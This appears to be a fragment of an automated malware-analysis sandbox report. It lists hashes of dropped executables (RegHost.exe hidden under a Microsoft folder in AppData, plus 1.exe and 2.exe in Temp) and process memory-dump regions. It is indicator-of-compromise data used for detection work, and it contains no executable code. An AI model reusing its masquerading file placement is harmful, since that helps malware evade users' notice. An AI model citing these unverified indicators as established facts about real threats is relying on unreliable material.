SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Local\Temp\1.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Local\Temp\1.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Local\Temp\1.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Local\Temp\2.exeMD5
5a2011564e7af8738d5e27adc9c092fc
SHA157641c05d00eeb816b76a1b16693099e35896578
SHA25629e38020e0c45af9e0b4a3639717422f4b41dd1d30139162c3eae50e2e38e81a
SHA512e9de4e2632dc026edec7495202336bad16e876a3322c2460fd1c0f874e8a0c822b8d66f50c6c5763d87d2d5b3ac87dc84a48490d37d4800b67fae57283c00603
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
84642504a53a9e58bf4b1ea4b78151c1
SHA1c9154d540b025959b133bdfbc3fa8976001339e3
SHA256be25561512a25ab19e56197f588b02b6f626121980beae4d698e3783a07204d7
SHA512539d1eafff80acdccb2191571b6ffde3e0ce242d9f3055ab102b38fa640158b7543b46542e46578c392024b563d0366e90731e9ee8d7bac2e30e111f55745ded
-
memory/332-103-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmpFilesize
8KB
-
memory/332-102-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-96-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-95-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-94-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-100-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-97-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-92-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-93-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-99-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/332-98-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/524-160-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/952-215-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/992-242-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-88-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-86-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-81-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-82-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-91-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-90-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-89-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-84-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-85-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-87-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1100-101-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1128-108-0x000000013FA10000-0x0000000140603000-memory.dmpFilesize
11.9MB
-
memory/1128-110-0x000000013FA10000-0x0000000140603000-memory.dmpFilesize
11.9MB
-
memory/1128-109-0x000000013FA10000-0x0000000140603000-memory.dmpFilesize
11.9MB
-
memory/1188-187-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1212-54-0x0000000000400000-0x00000000008F0000-memory.dmpFilesize
4.9MB
-
memory/1252-296-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1280-77-0x0000000000200000-0x0000000000216000-memory.dmpFilesize
88KB
-
memory/1280-113-0x0000000004EB0000-0x0000000004EB1000-memory.dmpFilesize
4KB
-
memory/1364-78-0x000000013F810000-0x0000000140403000-memory.dmpFilesize
11.9MB
-
memory/1364-73-0x000000013F810000-0x0000000140403000-memory.dmpFilesize
11.9MB
-
memory/1364-71-0x000000013F810000-0x0000000140403000-memory.dmpFilesize
11.9MB
-
memory/1628-66-0x0000000000B70000-0x0000000000B71000-memory.dmpFilesize
4KB
-
memory/1628-65-0x0000000000090000-0x00000000000B0000-memory.dmpFilesize
128KB
-
memory/1628-64-0x0000000075891000-0x0000000075893000-memory.dmpFilesize
8KB
-
memory/1628-57-0x0000000000090000-0x00000000000B0000-memory.dmpFilesize
128KB
-
memory/1628-56-0x0000000000090000-0x00000000000B0000-memory.dmpFilesize
128KB
-
memory/1668-133-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1844-140-0x000000013F080000-0x000000013FC73000-memory.dmpFilesize
11.9MB
-
memory/1844-139-0x000000013F080000-0x000000013FC73000-memory.dmpFilesize
11.9MB
-
memory/1844-138-0x000000013F080000-0x000000013FC73000-memory.dmpFilesize
11.9MB
-
memory/1972-269-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB